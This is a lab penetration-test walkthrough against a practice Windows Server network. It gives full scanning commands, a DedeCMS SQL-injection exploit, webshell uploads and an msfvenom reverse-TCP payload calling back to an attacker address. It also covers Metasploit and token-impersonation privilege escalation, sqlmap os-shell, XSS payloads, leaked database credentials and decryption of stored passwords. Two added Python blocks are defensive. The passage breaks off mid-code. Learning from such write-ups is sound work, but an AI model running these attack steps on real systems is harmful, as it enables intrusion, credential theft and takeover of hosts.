Simple internal network penetration based on Windows Server
- I. Internal network discovery
- 1) Detect live IPs
- 2) Scan ports
- 3) Probe port information
- 4) Set DNS, bind the gateway
- 5) Enumerate subdomains
- 6) Find and exploit website vulnerabilities, enter the site backend
- 6.1.0) Site one: new.cc123.com
- 6.1.1) Use version information
- 6.1.2) GetShell
- 6.1.3) Privilege escalation
- 6.2.0) Site two: ww2.cc123.com
- 6.2.1) Scan site directories
- 6.2.2) CAPTCHA reuse
- 6.2.3) Is there an injection vulnerability
- 6.2.4) Verify the XSS vulnerability
- 6.2.5) Verify whether a file upload vulnerability exists
- 6.2.6) Verify whether the news module has SQL injection
- 6.3) Code audit
- 6.3.1) Backend login module
- 6.3.2) News module
- 6.3.3) Editor
- 6.3.4) File upload
- 6.3.5) XSS vulnerability (front end)
- 6.4.0) Connect to the database with the large webshell
- 6.4.1) Audit the encryption method
- 6.4.2) mimikatz hash cracking
- II. Internal network penetration
- 1. Database server
- 1) Add route and proxy
- 2) Bind connection into the 10.10.10.0/24 segment
- 3) Crack hashes
- 2. Target host
- 1) Set up a route, pivot into the internal network
- 2) Scan the internal network with proxychains
- 3) Exploit the relevant vulnerability
- 3.1) Write an exploit tool
- 3.2) Use the tool to write a webshell
- 3.3) Set up the proxy, connect to the webshell with China Chopper
- 4) Establish a session in msf
- 5) Crack hashes
- III. Four flags
- 1. First
- 2. Second
- 3. Third
- 4. Fourth
0. Lab environment setup
Domain name to IP binding (set up the DNS server)
I. Internal network discovery
1) Detect live IPs
netdiscover
Internal network discovery
netdiscover -i eth0 -r 192.168.0.0/24
//netdiscover -i <interface> -r <target subnet>
or
nmap -sn 192.168.0.0/24
//nmap -sn <subnet>
2) Scan ports
masscan
Fast port scanner
masscan -p 1-65535 192.168.0.134 --rate=1000
masscan -p 1-65535 192.168.0.134 --rate=1000 --interface=eth0
//masscan -p <ports> <target IP> --rate=<packets per second> --interface=<interface>
//Specifying the interface also fixes the "cannot find default interface" problem
Or just use nmap
(apart from being a bit slow, it is still very good)
nmap 192.168.0.134 -sT -sV -p 1-65535
//nmap <IP> <scan mode> -p <ports>
Scan results (nmap returns results; masscan cannot find the default gateway, so set the default gateway)
53: probably a DNS server
999: phpMyAdmin
Pitfall one: masscan cannot find the default interface
Check the interface
arp
Add the default route for the interface
route add default gw 192.168.0.1 eth0
//route add default gw <gateway IP> <interface>
Pitfall fixed:
3) Probe port information
nmap
Scan for service information on the ports
nmap 192.168.0.134 -sC -A -p 21,53,80,135,999,3389,6588,49154,49155 -oA cc123-port
//nmap <IP> -sC (default scripts) -A (all: OS detection, version detection, scripts, traceroute) -p <ports> -oA <output file base name>
Scan results
Visit the web ports in a browser to gather information:
80
999
6588
4) Set DNS, bind the gateway
Pitfall two: the setting failed (it had been applied to the interface used for everyday Internet access), so the hosts-file binding was kept for the time being
Solution (set DNS correctly):
Set it on the interface for the target segment (the interface on 192.168.0.0)
On Kali, for the gateway that is bound:
vi /etc/resolv.conf
Change the nameserver to the DNS server's IP
5) Enumerate subdomains
Use wfuzz
wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-110000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
//wfuzz -w <wordlist path> -u <domain> -H "Host:FUZZ.cc123.com" (FUZZ is the placeholder each wordlist entry replaces) --hw <N> (hide responses with N words; here it filters the responses returned for non-existent hosts)
A smaller wordlist can also be used
# wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://cc123.com/
Total requests: 5000

=====================================================================
ID           Response   Lines    Word     Chars       Payload
=====================================================================
000000001:   200        969 L    2160 W   43741 Ch    "www"
000000030:   200        461 L    1270 W   22594 Ch    "new"
000001176:   200        969 L    2160 W   43741 Ch    "WWW"
000002700:   400        6 L      26 W     334 Ch      "m."
000002795:   400        6 L      26 W     334 Ch      "ns2.cl.bellsouth.net."
000002885:   400        6 L      26 W     334 Ch      "ns2.viviotech.net."
000002883:   400        6 L      26 W     334 Ch      "ns1.viviotech.net."
000003050:   400        6 L      26 W     334 Ch      "ns3.cl.bellsouth.net."
000004081:   400        6 L      26 W     334 Ch      "ferrari.fortwayne.com."
000004083:   400        6 L      26 W     334 Ch      "quatro.oweb.com."
000004082:   400        6 L      26 W     334 Ch      "jordan.fortwayne.com."
000000267:   200        931 L    1878 W   30822 Ch    "ww2"

Total time: 19.28832
Processed Requests: 5000
Filtered Requests: 4988
Requests/sec.: 259.2241
Visit each one (the DNS server must be bound beforehand):
www.cc123.com
new.cc123.com
ww2.cc123.com
Subdomains found:
www.cc123.com
ww2.cc123.com
new.cc123.com
6) Find and exploit website vulnerabilities, enter the site backend
6.1.0) Site one: new.cc123.com
6.1.1) Use version information
Check the version number
/data/admin/ver.txt
20150618
dede/login.php
//default backend login page (in real engagements it may sit one directory level deeper, etc.)
Try logging in with the default password
Check whether member registration is enabled
/member/
Register an account
Search the web for vulnerabilities in this version and use the corresponding exp
This exp needs a cookie and a Python 2 host environment to run
A category must be added first: the vulnerability is in the category function, and the injection needs the category id and other data
python2 Dedecms_20150618_member_sqli.py http://new.cc123.com
Exp result
MD5 lookup
Got the password and logged into the backend
6.1.2) GetShell
Upload a one-line webshell
Connect with AntSword, getshell
6.1.3) Privilege escalation
Upload an aspx script file
Visit it and log in
It can run cmd commands
Work together with Metasploit for the next step
Generate the shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.128 lport=8888 -f exe > /root/shell.exe
Upload wt.asp (check the website directory permissions) and visit it
Upload shell.exe into the c:\windows\debug\WIA\ directory, run it through the script, and establish a session with msf
Check the IP, privileges and other basic information
Use the msf privilege escalation module (on Kali 2021 with msf6 the POST module errored out; switched to Kali 2020 with msf5)
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.0.134 - Collecting local exploits for x86/windows...
[*] 192.168.0.134 - 30 exploit checks are being tried...
[+] 192.168.0.134 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 192.168.0.134 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Results returned
Use the privilege escalation module ms16_075_reflection_juicy (commonly used)
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > options

Module options (exploit/windows/local/ms16_075_reflection_juicy):

   Name     Current Setting                         Required  Description
   ----     ---------------                         --------  -----------
   CLSID    {4991d34b-80a1-4291-83b6-3328366b9097}  yes       Set CLSID value of the DCOM to trigger
   SESSION                                          yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run
Failed
Pitfall three: port settings for privilege escalation
For the ms16-075 escalation the listening host must not be 127.0.0.1, and privileges have to be raised starting from the website's privilege
The module's options do not show lhost and lport parameters, but they can still be set
use exploit/windows/local/ms16_075_reflection_juicy
set lhost 192.168.0.129 //cannot use 127.0.0.1
set lport 4444
set session 1
exploit
Privilege escalation with MS16-075 [token stealing]
Upload the exp
c:\windows\debug\WIA\potato.exe
In the session:
use incognito
list_tokens -u //list tokens
Run the exp
execute -cH -f c:/windows/debug/WIA/potato.exe
Check list_tokens -u again
impersonate_token "NT AUTHORITY\SYSTEM" //escalate
If running the exp once fails, try running it a few more times
SYSTEM privileges obtained
6.2.0) Site two: ww2.cc123.com
6.2.1) Scan site directories
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 16 Jul 2021 15:49:37 GMT
Content-Length: 11541
From the response headers the site can be identified as an ASP.NET 4.0 site
From the URLs, the whole site uses URL rewriting (pseudo-static pages)
Use gobuster (not bundled with Kali) to scan site directories (fast)
gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'aspx,html,zip' --timeout 20000ms -o /home/kali/Desktop/cc123/ww2_cc123.com.txt
//gobuster dir -u <site, with http> -w <wordlist> -x '<extensions>' --timeout <time in ms> [default 10s] -o <output path>
The results can be filtered on the command line (but unless there is a specific need, it is better to analyze the file with all status codes, so the admin redirect result is not missed)
cat /home/kali/Desktop/cc123/ww2_cc123.com.txt|grep 200 > /home/kali/Desktop/cc123/ww2.com.txt
//filter the 200 or 301 (redirect) results for easier analysis
Found admin
6.2.2) CAPTCHA reuse
The default password can be tried first [usually useless]
Capture the request with Burp Suite and test whether the CAPTCHA can be reused
Submissions 2 and 3 both returned "username or password incorrect", from which we conclude the CAPTCHA can be reused
Password brute-forcing is therefore possible
6.2.3) Is there an injection vulnerability
Try injection in the parameters and check for errors (use the browser for this; some Chinese text shows up garbled in Burp)
Found a redirect and its target path
Following the redirect path leads straight into the site backend
6.2.4) Verify the XSS vulnerability
Using the backend directory, go to /message.aspx, the guestbook module
Check whether HTML tags are filtered
Submit, then view it in the backend
The tag takes effect: stored XSS
Try alert
JS code executes
JS that steals cookies can be injected through the XSS; when the administrator views the page, the JS runs, the administrator's cookie is obtained and the backend can be entered
6.2.5) Verify whether a file upload vulnerability exists
Found a file upload point
Capture with Burp
A whitelist is used
Not enough skill to get past it; verification failed
6.2.6) Verify whether the news module has SQL injection
The news module passes parameters such as id
Capture with Burp
Try injection with sqlmap
sqlmap -r cc123.txt --dbms mssql -v 1 --batch
//sqlmap -r <request file> --dbms <database type> -v <verbosity> --batch (accept all defaults)
SQL injection exists
Look at the databases
sqlmap had trouble retrieving data
Check the current database and current user
sqlmap -r cc123.txt --dbms mssql -v 1 --batch --current-db --current-user
The current user is sa
With such high privileges, try getting a shell
sqlmap -r cc123.txt --dbms mssql -v 1 --os-shell
//returns a shell
Success
Commands can be run
The database server's IP:
Windows IP 配置

以太网适配器 本地连接 2:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::70bc:cf3:8c1c:737e
   IPv4 地址 . . . . . . . . . . . . : 10.10.1.128
   子网掩码 . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::ec7d:88c4:723a:e954
   IPv4 地址 . . . . . . . . . . . . : 10.10.10.136
   子网掩码 . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :
The web server and the database server are separate hosts (the database is on 10.10.10.136, which also has a second interface on 10.10.1.128)
Check the current privilege
Already SYSTEM privileges
Check open ports
活动连接
协议 本地地址 外部地址 状态 PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1152
TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING 1180
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 368
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 740
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 836
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:49160 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49161 0.0.0.0:0 LISTENING 1928
TCP 10.10.1.128:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.136:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.136:1433 10.10.10.135:49561 ESTABLISHED 1152
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1152
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 692
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:1433 [::]:0 LISTENING 1152
TCP [::]:2383 [::]:0 LISTENING 1180
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 368
TCP [::]:49153 [::]:0 LISTENING 740
TCP [::]:49154 [::]:0 LISTENING 836
TCP [::]:49155 [::]:0 LISTENING 484
TCP [::]:49160 [::]:0 LISTENING 476
TCP [::]:49161 [::]:0 LISTENING 1928
TCP [::1]:1434 [::]:0 LISTENING 1152
UDP 0.0.0.0:123 : 920
UDP 0.0.0.0:500 : 836
UDP 0.0.0.0:4500 : 836
UDP 0.0.0.0:5355 : 1004
UDP 10.10.1.128:137 : 4
UDP 10.10.1.128:138 : 4
UDP 10.10.10.136:137 : 4
UDP 10.10.10.136:138 : 4
UDP 127.0.0.1:64117 : 2904
UDP [::]:123 : 920
UDP [::]:500 : 836
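What the listing says about exposure is easier to see with a parser. This is an added example (not from the original writeup): it reads netstat -ano rows, constructed here from a subset of the listing above, and reports which services are bound to every interface of this dual-homed host (so reachable from both 10.10.10.0/24 and 10.10.1.0/24, including SQL Server on 1433), which are loopback-only, and which remote hosts hold established connections to a port.

```python
from collections import defaultdict

# Constructed sample: a subset of the netstat -ano lines from the listing above
# (database server with interfaces 10.10.10.136 and 10.10.1.128).
NETSTAT_SAMPLE = """\
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 692
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1152
TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING 1180
TCP 10.10.1.128:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.136:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.136:1433 10.10.10.135:49561 ESTABLISHED 1152
TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1152
TCP [::]:1433 [::]:0 LISTENING 1152
TCP [::1]:1434 [::]:0 LISTENING 1152
UDP 0.0.0.0:123 : 920
UDP 10.10.1.128:137 : 4
"""

ANY_ADDRS = {"0.0.0.0", "::"}
LOOPBACK_ADDRS = {"127.0.0.1", "::1"}


def split_addr(addr):
    """'10.10.10.136:1433' -> ('10.10.10.136', 1433); '[::]:80' -> ('::', 80).
    A bare ':' (UDP remote column) yields port None."""
    host, _, port = addr.rpartition(":")
    port_num = int(port) if port.isdigit() else None
    return host.strip("[]"), port_num


def parse_netstat(text):
    """Parse netstat -ano rows; UDP rows carry no state and an empty remote."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            remote, state, pid = parts[2], parts[3], parts[4]
        else:
            remote, state, pid = parts[2], "", parts[3]
        lhost, lport = split_addr(parts[1])
        entries.append({"proto": parts[0], "lhost": lhost, "lport": lport,
                        "remote": remote, "state": state, "pid": int(pid)})
    return entries


def scope(host):
    """Classify a bind address by who can reach it."""
    if host in ANY_ADDRS:
        return "all-interfaces"
    if host in LOOPBACK_ADDRS:
        return "loopback"
    return "one-interface:" + host


def listener_scopes(entries):
    """(proto, port) -> set of bind scopes for sockets that accept traffic."""
    scopes = defaultdict(set)
    for e in entries:
        if e["proto"] == "UDP" or e["state"] == "LISTENING":
            scopes[(e["proto"], e["lport"])].add(scope(e["lhost"]))
    return scopes


def exposed_everywhere(entries):
    """Services a host on any attached segment can reach (bound to 0.0.0.0 or ::)."""
    return sorted(key for key, s in listener_scopes(entries).items()
                  if "all-interfaces" in s)


def loopback_only(entries):
    """Services that only local processes can reach."""
    return sorted(key for key, s in listener_scopes(entries).items()
                  if s <= {"loopback"})


def clients_of(entries, port):
    """Remote hosts holding an ESTABLISHED connection to a local port."""
    return sorted({split_addr(e["remote"])[0] for e in entries
                   if e["state"] == "ESTABLISHED" and e["lport"] == port})


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_SAMPLE)
    print("reachable from every segment:", exposed_everywhere(rows))
    print("loopback only:", loopback_only(rows))
    print("clients of 1433:", clients_of(rows, 1433))
```

On this host SQL Server (1433) is bound to all interfaces, so the 10.10.1.0/24 side that is pivoted into later can reach it just as the web tier on 10.10.10.135 does; binding it to the web-tier interface or filtering 1433 on the second interface would cut that path.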
For pseudo-static pages, you can look at the config file in the session to find the real parameters of the corresponding file and then access them in the URL (to check whether injection is possible)
6.3) Code audit
Use AntSword to locate the site directory, then download the site source in the Kali session
C:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web
download bin
mv bin cc123s
//move the folder to cc123
6.3.1) Backend login module
Audit admin/login.aspx
The code is in ccwl_admin_login, App_Web_login.aspx.fdf7a39c
This is the login check
protected void ImageButton1_Click(object sender, ImageClickEventArgs e)
{
    // Take the CAPTCHA value from the cookie and compare it with the submitted value (trimmed, upper-cased); on mismatch, bail out
    if (!(base.Request.Cookies["CheckCode"].Value == this.safecode.Text.Trim().ToUpper()))
    {
        base.Response.Write("<script>alert('验证码输入错误!');javascript:history.back(-1);</script>");
        // The CAPTCHA is not invalidated on failure, so it can be reused
        return;
    }
    // The SQL statement is assembled with Concat
    string sql = string.Concat(new string[]
    {
        "select*from admin where username='",
        this.username.Text.Trim(), // no parameter filtering: SQL injection
        "' and password='",
        StringClass.Encrypt(this.password.Text.Trim(), "yx139222"), // Encrypt is a custom encryption function; the second argument is the key
        "'"
    });
    DataSet tableData = DBClass.GetTableData(sql, "admin"); // execute the SQL and fetch the data
    if (tableData != null && tableData.Tables["admin"].Rows.Count > 0)
    {
        this.Session["users"] = this.username.Text.Trim();
        base.Response.Redirect("index.aspx");
        return;
    }
    base.Response.Write("<script>alert('姓名或密码输入错误!');javascript:history.back(-1);</script>");
}
6.3.2) News module
newsadd.aspx
Page load code
protected void Page_Load(object sender, EventArgs e)
{
    if (base.Request.QueryString["pid"] != null && base.Request.QueryString["pid"].ToString() != "") // enter only if the string is non-empty
    {
        this.pid = Convert.ToInt32(base.Request.QueryString["pid"].ToString()); // pid is converted to Int32, so no injection here
    }
    AdminCs.CheckLoginState(); // verify the login state (checks the user value; if not logged in, redirects to the login page)
    if (!base.IsPostBack) // not a POST postback
    {
        this.p.type(this.DropDownList1, this.pid.ToString());
        if (base.Request.QueryString["id"] != null) // QueryString fetches the string
        {
            this.Button1.Visible = false;
            this.Button2.Visible = true;
            string sql = "select*from news where id=" + base.Request.QueryString["id"].ToString(); // the id string is used directly without filtering: SQL injection
            DataSet tableData = DBClass.GetTableData(sql, "sql"); // execute the statement
            if (tableData.Tables["sql"].Rows.Count > 0)
            {
                this.DropDownList1.SelectedValue = tableData.Tables["sql"].Rows[0]["type"].ToString();
                this.Textbox1.Text = tableData.Tables["sql"].Rows[0]["title"].ToString();
                this.txtProImg.Text = tableData.Tables["sql"].Rows[0]["images"].ToString();
                this.content1.InnerHtml = tableData.Tables["sql"].Rows[0]["content"].ToString();
            }
        }
    }
}
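To make the audit findings in 6.3.1 and 6.3.2 concrete, here is an added example (not the site's code) in Python with an in-memory SQLite stand-in for the admin table. The first function mirrors the shape of ImageButton1_Click (expected CAPTCHA read from a client-controlled cookie and never invalidated; username spliced into the SQL string); the second shows the fix that also closes the id= concatenation in newsadd.aspx: parameter binding, a server-side single-use CAPTCHA, and a salted PBKDF2 hash in place of a reversible encoding. site_encrypt, CaptchaStore and the table contents are constructed stand-ins.

```python
import hashlib
import hmac
import secrets
import sqlite3


def site_encrypt(password):
    """Stand-in for the site's StringClass.Encrypt (DES with the key reused as IV).
    Any deterministic, reversible encoding shares its weakness, so a hex encoding
    is enough to mirror the shape of the stored value."""
    return password.encode("utf-8").hex().upper()


def make_site_db():
    """Constructed in-memory copy of the 'admin' table as the site keeps it:
    the password column holds a reversible encoding, not a hash."""
    db = sqlite3.connect(":memory:")
    db.execute("create table admin (id integer, username text, password text)")
    db.execute("insert into admin values (28, 'admin', ?)", (site_encrypt("cc123"),))
    return db


def vulnerable_login(db, cookie_code, typed_code, username, password):
    """Mirrors ImageButton1_Click: the expected CAPTCHA comes from a cookie the
    client controls and is never cleared, and user input is spliced into SQL."""
    if cookie_code != typed_code.strip().upper():
        return "captcha-error"          # the code stays valid for the next attempt
    sql = ("select * from admin where username='" + username.strip()
           + "' and password='" + site_encrypt(password.strip()) + "'")
    rows = db.execute(sql).fetchall()   # a quote in username rewrites the query
    return "logged-in" if rows else "bad-credentials"


def pbkdf2(password, salt):
    """Slow, salted password hash (replaces the reversible Encrypt)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def make_hardened_db():
    """Constructed table for the fixed version: a salt and a hash per account."""
    db = sqlite3.connect(":memory:")
    db.execute("create table admin (id integer, username text, salt blob, pwhash blob)")
    salt = secrets.token_bytes(16)
    db.execute("insert into admin values (28, 'admin', ?, ?)", (salt, pbkdf2("cc123", salt)))
    return db


class CaptchaStore:
    """Server-side CAPTCHA codes keyed by session id; each code is good for
    exactly one login attempt, whether or not that attempt succeeds."""

    def __init__(self):
        self._codes = {}

    def issue(self, session_id):
        code = secrets.token_hex(2).upper()
        self._codes[session_id] = code
        return code

    def consume(self, session_id, typed_code):
        expected = self._codes.pop(session_id, None)   # gone after one use
        if expected is None:
            return False
        return hmac.compare_digest(expected.encode(), typed_code.strip().upper().encode())


def hardened_login(db, captchas, session_id, typed_code, username, password):
    """Fixed flow: single-use CAPTCHA, bound parameter (the same fix closes the
    id= concatenation in newsadd.aspx), constant-time hash comparison."""
    if not captchas.consume(session_id, typed_code):
        return "captcha-error"
    row = db.execute("select salt, pwhash from admin where username = ?",
                     (username.strip(),)).fetchone()
    if row is None:
        return "bad-credentials"
    salt, pwhash = row
    if hmac.compare_digest(pwhash, pbkdf2(password.strip(), salt)):
        return "logged-in"
    return "bad-credentials"


if __name__ == "__main__":
    vdb = make_site_db()
    print(vulnerable_login(vdb, "AB12", "ab12", "admin'--", "anything"))   # logged-in
    hdb, store = make_hardened_db(), CaptchaStore()
    code = store.issue("session-1")
    print(hardened_login(hdb, store, "session-1", code, "admin'--", "anything"))   # bad-credentials
```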
6.3.3) Editor
The editor is KindEditor
The vulnerability is in the KindEditor editor: .txt and .html files can be uploaded, and it affects KindEditor 4.1.5 and earlier
At the image upload point, upload a malicious html file and capture the request with Burp
2.html
Its content steals the cookie
Modify the request to bypass the check and upload
Upload succeeded
{"error":0,"url":"/editor/asp.net/../attached/file/20210718/20210718142058_2606.html"}
Verified
6.3.4) File upload
Capture the upload request, locate the file, and use the key parameters to find the corresponding handler code
Key parameters
Handler code
protected void UpImg_Click(object sender, EventArgs e)
{
    if (base.Request.Url.ToString().IndexOf("grcms.cn") > 0) // IndexOf returns the first position of "grcms.cn" in the URL; used to check whether this value was changed
    {
        base.Response.Write("<script>alert('网站样例,不可以修改数据。');location.href='" + base.Request.Url.ToString() + "';</script>");
        return;
    }
    if (this.FileUpload1.PostedFile.ContentLength >= 500000) // size check
    {
        base.Response.Write("<script language='javascript'>alert('你的图片已经超过500K的大小!');</script>");
        return;
    }
    string fileName = this.FileUpload1.FileName;
    string text = DateTime.Now.ToString("yyyyMMddhhmmss"); // the file is named with the timestamp
    fileName.Substring(fileName.LastIndexOf("\\") + 1); // leftover from decompilation, no effect
    string text2 = fileName.Substring(fileName.LastIndexOf(".") + 1); // take the extension
    if (text2 == "bmp" || text2 == "jpg" || text2 == "gif" || text2 == "JPG" || text2 == "BMP" || text2 == "GIF" || text2 == "png") // whitelist
    {
        this.FileUpload1.SaveAs(string.Concat(new string[] { base.Server.MapPath("\\UpImg"), "\\", text, ".", text2 }));
        "UpImg/" + text + "." + text2; // leftover from decompilation, no effect
        this.txtProImg.Text = "UpImg/" + text + "." + text2; // the saved name is the timestamp plus the whitelisted extension, so there is no bypass (1.php;.png is also saved as <time>.png)
        return;
    }
    base.Response.Write("<script language='javascript'>alert('支持格式:|jpg|gif|bmp|png|');</script>");
}
The audit shows there is no upload vulnerability here
6.3.5) XSS vulnerability (front end)
mystat.aspx
Code:
<%@ page language="c#" runat="server" %>
<script language="c#" runat="server">
public string strStyle;
public string strtheurl;
public void Page_Load(Object src, EventArgs e)
{
    NameValueCollection ServerVariables = Request.ServerVariables;
    strStyle = Request.QueryString["style"]; // take the style value
    strtheurl = ServerVariables["URL"].ToString(); // take the URL
    strtheurl = strtheurl.Substring(0, strtheurl.IndexOf("mystat.aspx", 0, strtheurl.Length));
    strtheurl = "http://" + ServerVariables["HTTP_HOST"].ToString() + strtheurl;
}
</script>
// The JS below writes the values out, and style above is not filtered: XSS
document.write("<script>var style='<%=strStyle%>';var url='<%=strtheurl%>';</script>")
_dwrite("<script language=javascript src="+url+"stat.aspx?style="+style+"&referer="+escape(document.referrer)+"&screenwidth="+(screen.width)+"></script>");
function _dwrite(string) {document.write(string);}
Verified
Page source after the parameter is substituted
URLs that close the string:
ww2.cc123.com/mystat.aspx?style=1'</script>""<script>alert(/xss/);'
ww2.cc123.com/mystat.aspx?style=</script><script>alert(/xss/);</script><script>
6.4.0) Connect to the database with the large webshell
Use the earlier SYSTEM-privilege session to view the database configuration
<add key="ConnectionString" value="server=WIN-JJU7KU45PN7;database=grcms_data;uid=sa;pwd=!@#a123.." />
Connected successfully
Query the administrator passwords
select * from admin
id  username  password
28  admin     AE5F6187F32825CA
30  cc123     B97C57DB005F954242450A255217DA9F
//MD5 lookup failed; analyze the encryption method in the code
6.4.1) Audit the encryption method
In the administrator login module, look for the encryption function
Encryption/decryption module
DES encryption source (DESCryptoServiceProvider):
// StringClass
public static string Encrypt(string pToEncrypt, string sKey)
{
    DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
    byte[] bytes = Encoding.Default.GetBytes(pToEncrypt);
    dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
    dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey); // the key is reused as the IV
    MemoryStream memoryStream = new MemoryStream();
    CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateEncryptor(), CryptoStreamMode.Write);
    cryptoStream.Write(bytes, 0, bytes.Length);
    cryptoStream.FlushFinalBlock();
    StringBuilder stringBuilder = new StringBuilder();
    byte[] array = memoryStream.ToArray();
    for (int i = 0; i < array.Length; i++)
    {
        byte b = array[i];
        stringBuilder.AppendFormat("{0:X2}", b); // hex-encode the ciphertext
    }
    stringBuilder.ToString();
    return stringBuilder.ToString();
}
DES decryption source:
// StringClass
public static string Decrypt(string pToDecrypt, string sKey)
{
    DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
    byte[] array = new byte[pToDecrypt.Length / 2];
    for (int i = 0; i < pToDecrypt.Length / 2; i++) // hex-decode the ciphertext
    {
        int num = Convert.ToInt32(pToDecrypt.Substring(i * 2, 2), 16);
        array[i] = (byte)num;
    }
    dESCryptoServiceProvider.Key = Encoding.ASCII.GetBytes(sKey);
    dESCryptoServiceProvider.IV = Encoding.ASCII.GetBytes(sKey);
    MemoryStream memoryStream = new MemoryStream();
    CryptoStream cryptoStream = new CryptoStream(memoryStream, dESCryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Write);
    cryptoStream.Write(array, 0, array.Length);
    cryptoStream.FlushFinalBlock();
    new StringBuilder();
    return Encoding.Default.GetString(memoryStream.ToArray());
}
The stored passwords are therefore not hashed but encrypted with DES under a key that is hard-coded in the login code ("yx139222") and reused as the IV, so anyone with the source can reverse them.
With the decryption function and the key, a decryption tool can be written
Here a VS2012 C# .NET 4.5 Windows Forms application is used
Tool code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        // Copied from the site's StringClass.Decrypt
        public static string Decrypt(string pToDecrypt, string sKey)
        {
            DESCryptoServiceProvider dESCryptoServiceProvider = new DESCryptoServiceProvider();
            byte[] array = new byte[pToDecrypt.Length / 2];
            for (int i = 0; i < pToDecrypt.Length / 2; i++)
            {
                int num = Convert.ToInt32(pToDecrypt.Substring(i * 2, 2), 16);
